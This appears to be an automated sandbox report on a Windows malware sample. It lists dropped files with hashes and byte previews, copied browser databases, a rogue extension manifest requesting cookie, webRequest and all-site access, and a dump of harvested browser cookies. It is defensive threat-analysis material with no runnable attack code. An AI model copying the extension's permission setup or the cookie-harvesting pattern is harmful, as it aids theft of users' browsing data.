                                                                                                                                                                        SHA-512:A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.|...|...|...t...|...p...|...p...|...p...|...p...|..~t...|..._...|...t...|..~t...|...|..6|..sk...|..sk...|...w...|..sk...|..Rich.|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\download_engine.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):3512776
                                                                                                                                                                        Entropy (8bit):6.514740710935125
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
                                                                                                                                                                        MD5:1A87FF238DF9EA26E76B56F34E18402C
                                                                                                                                                                        SHA1:2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
                                                                                                                                                                        SHA-256:ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
                                                                                                                                                                        SHA-512:B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):503808
                                                                                                                                                                        Entropy (8bit):6.4043708480235715
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
                                                                                                                                                                        MD5:A94DC60A90EFD7A35C36D971E3EE7470
                                                                                                                                                                        SHA1:F936F612BC779E4BA067F77514B68C329180A380
                                                                                                                                                                        SHA-256:6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
                                                                                                                                                                        SHA-512:FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):348160
                                                                                                                                                                        Entropy (8bit):6.56488891304105
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
                                                                                                                                                                        MD5:CA2F560921B7B8BE1CF555A5A18D54C3
                                                                                                                                                                        SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
                                                                                                                                                                        SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
                                                                                                                                                                        SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):59904
                                                                                                                                                                        Entropy (8bit):6.753320551944624
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
                                                                                                                                                                        MD5:89F6488524EAA3E5A66C5F34F3B92405
                                                                                                                                                                        SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
                                                                                                                                                                        SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
                                                                                                                                                                        SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ecvB803.tmp
                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\1612045890161.exe
                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb2e8beb6, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):26738688
                                                                                                                                                                        Entropy (8bit):1.0164576350128136
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:wEwqTaoxujmVezmgxeCAGiSoB0yLKgSFDb7uBi:GmVezxerk
                                                                                                                                                                        MD5:4D015B11306E72A07B0F37934ABF3A16
                                                                                                                                                                        SHA1:288A561B9346A93F4BF13ABEA91A5B4097D27504
                                                                                                                                                                        SHA-256:DB4D8315572F112B0A7AA20F26A779A10613D81C11C6646810F369AFBBC17C44
                                                                                                                                                                        SHA-512:E406B63B2E3FDC4BB666EF3E26F092E16D54DD155142E1524828DCFD13251CB312B785AFD97172A75227A6377057E6348889A443AA4D7706C0EAE60436201FD3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: ..... .......50.......te3....wg.......................)..........x/.*....x..h.+.........................6..43....wI.............................................................................................Z............B.................................................................................................................. .......3....y......................................................................................................................................................................................................................................uPP%3....y.c................qn.1....x..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                                                        Process:C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        File Type:;1033
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):237056
                                                                                                                                                                        Entropy (8bit):6.262405449836627
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
                                                                                                                                                                        MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
                                                                                                                                                                        SHA1:699BD8924A27516B405EA9A686604B53B4E23372
                                                                                                                                                                        SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
                                                                                                                                                                        SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: ......................>.......................................................|.......|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:7-zip archive data, version 0.3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1397922
                                                                                                                                                                        Entropy (8bit):7.999863097294012
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
                                                                                                                                                                        MD5:18C413810B2AC24D83CD1CDCAF49E5E1
                                                                                                                                                                        SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
                                                                                                                                                                        SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
                                                                                                                                                                        SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: 7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5*zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~|J^.*YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....|..n1...Y.i4\.ZN..V....U)...|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):293320
                                                                                                                                                                        Entropy (8bit):6.347427939821131
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
                                                                                                                                                                        MD5:208662418974BCA6FAAB5C0CA6F7DEBF
                                                                                                                                                                        SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
                                                                                                                                                                        SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
                                                                                                                                                                        SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Web Data1612045902911
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\crx.7z
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:7-zip archive data, version 0.3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):36105
                                                                                                                                                                        Entropy (8bit):7.994610469125073
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
                                                                                                                                                                        MD5:DAFDD7237BA10D0C91295CD1C15749B2
                                                                                                                                                                        SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
                                                                                                                                                                        SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
                                                                                                                                                                        SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: 7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.*w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;*...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...|....3...X.E.N.I7...]".50.6...or
                                                                                                                                                                        C:\Users\user\AppData\Local\crx.json
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1981
                                                                                                                                                                        Entropy (8bit):5.365969892012237
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                                                        MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                                                        SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                                                        SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                                                        SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
                                                                                                                                                                        C:\Users\user\AppData\Localwebdata1612045902958
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Roaming\1612045890161.exe
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):103632
                                                                                                                                                                        Entropy (8bit):6.404475911013687
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                                                        MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                                        SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                                                        SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                                                        SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 14%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Roaming\1612045890161.txt
                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\1612045890161.exe
                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):27328
                                                                                                                                                                        Entropy (8bit):3.7078509698470126
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:b3w/3wBkf3DpvI6PprepmlmE1lVT0oMoSDNlkSP:bqg+flvIKpt3VvODNlkSP
                                                                                                                                                                        MD5:C82FB62C10E490945B2CB638D72998D2
                                                                                                                                                                        SHA1:1F746A26B442E8D69457445D78F0E2F52BAE9D66
                                                                                                                                                                        SHA-256:6CC5B1B6DB576F487EC2B21D258BEDFAA1E233DBA53A663C1019AF8ECC7F8D53
                                                                                                                                                                        SHA-512:A13B2F8C7796AE7276B52993ECC1627B58082321699D5C5C72D7BFC042F6B24283A26F227DFF0B8249769C5B2E96137A10391752BD28EE21672F44ADAB5429D3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: ..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.0.6. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.3.1./.2.0.3.7. .1.0.:.5.9.:.1.4. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".C.O.N.S.E.N.T.".,.....".V.a.l.u.e.".:.".W.P...2.7.b.6.d.e.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".1.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.1.2.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.0.:.2.3.:.1.1. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".1.2./.2.7./.2.0.1.9. .9.:.2.3.:.1.1. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".g.o.o.g.l.e...c.h.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".N.I.D.".,.....".V.a.l.u.e.".:.".1.8.6.=.f.q.t.N.G.i.j.l.-.o.b.4.K.y.V.I.p.O.b.W.8.G.z.s.h.L.K.8.N.W.5._.R.t.7.6.F.k.H.Q.W.U.N.y.S.-.V.3.z.5.y.T.b.R.q.2.m.w.h.c.z.E.m.a.5.

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.745694560857276
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:fnhcdXEfus.exe
                                                                                                                                                                        File size:4453376
                                                                                                                                                                        MD5:18169f98e39ae228d131aec477c8a2e9
                                                                                                                                                                        SHA1:c6c6eacaa8df6ea5251c7f26a2d9ec4317092e6a
                                                                                                                                                                        SHA256:344b323928698d9982c7577e5405a1cb587c45f94a0f6745827648381397f255
                                                                                                                                                                        SHA512:8deaca50e918252ba85715c85096e810733a9512c656fa40ad71e22437cc8f74d1965468592929a4b1216d33da598c308b312f5c1aa770f62959c873a4582efb
                                                                                                                                                                        SSDEEP:98304:bCgleegKSmFIJuPzyoCe1NGDyqMcKzH4znz8xViN:bBbviJu7JC0UDLwzanz8xQ
                                                                                                                                                                        File Content Preview:MZ......................@.............................................d....L.!This program cannot be run in DOS mode....$..............Z...Z...Zw]qZ...Zw]lZ...Z$\oZ...Z$\lZZ..Z)..Z...Z$\mZ...Z)..Z...Z...Zu..Zw]mZ...Zw]kZ...Z..5Z...Zw]nZ...ZRich...Z.......

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:497971328ce1634d

                                                                                                                                                                        Static PE Info

                                                                                                                                                                        General

                                                                                                                                                                        Entrypoint:0x44523a
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                        Time Stamp:0x5BA39B6E [Thu Sep 20 13:06:54 2018 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                        File Version Major:5
                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                        Import Hash:d91a0a44f8762e656db1be8576dd54b2

                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                        Instruction
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        sub ebp, 18h
